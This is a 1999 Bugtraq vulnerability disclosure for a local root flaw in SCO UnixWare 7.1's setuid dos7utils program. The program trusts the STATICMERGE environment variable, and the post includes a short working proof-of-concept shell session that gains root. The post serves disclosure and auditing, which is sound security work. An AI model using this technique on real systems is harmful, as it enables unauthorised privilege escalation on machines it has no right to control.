Bugtraq mailing list archives
SCO UnixWare 7.1 local root exploit
From: btellier () USA NET (Brock Tellier)
Date: Tue, 5 Oct 1999 12:30:49 MDT
Greetings,

A vulnerability exists in the /usr/lib/merge/dos7utils program (suid root by default) which allows any user to execute any command as root. The dos7utils program gets its localeset.sh exec path from the environment variable STATICMERGE. By setting this to a directory writable by us and setting the -f switch, we can have dos7utils run our program as follows:

bash-2.02$ uname -a; id; pwd
UnixWare fear71 5 7.1.0 i386 x86at SCO UNIX_SVR5
uid=101(xnec) gid=1(other)
/usr/lib/merge
bash-2.02$ export STATICMERGE=/tmp
bash-2.02$ cat > /tmp/localeset.sh
#!/bin/sh
id
bash-2.02$ chmod 700 /tmp/localeset.sh
bash-2.02$ ./dos7utils -f bah
uid=0(root) gid=1(other) groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)
bash-2.02$

----

Searching through the securityfocus vulnerability archives yields 0 matches for search string "unixware", but several for "openserver". I thought this was rather strange, considering that SCO is discontinuing OpenServer after 5.0.5 in favor of the much more reliable (though not security-wise, evidently) UnixWare 7. And so begins my audit of the virgin UnixWare 7 so soon after my incomplete audit of SCO 5.0.5.

Brock Tellier
UNIX Systems Administrator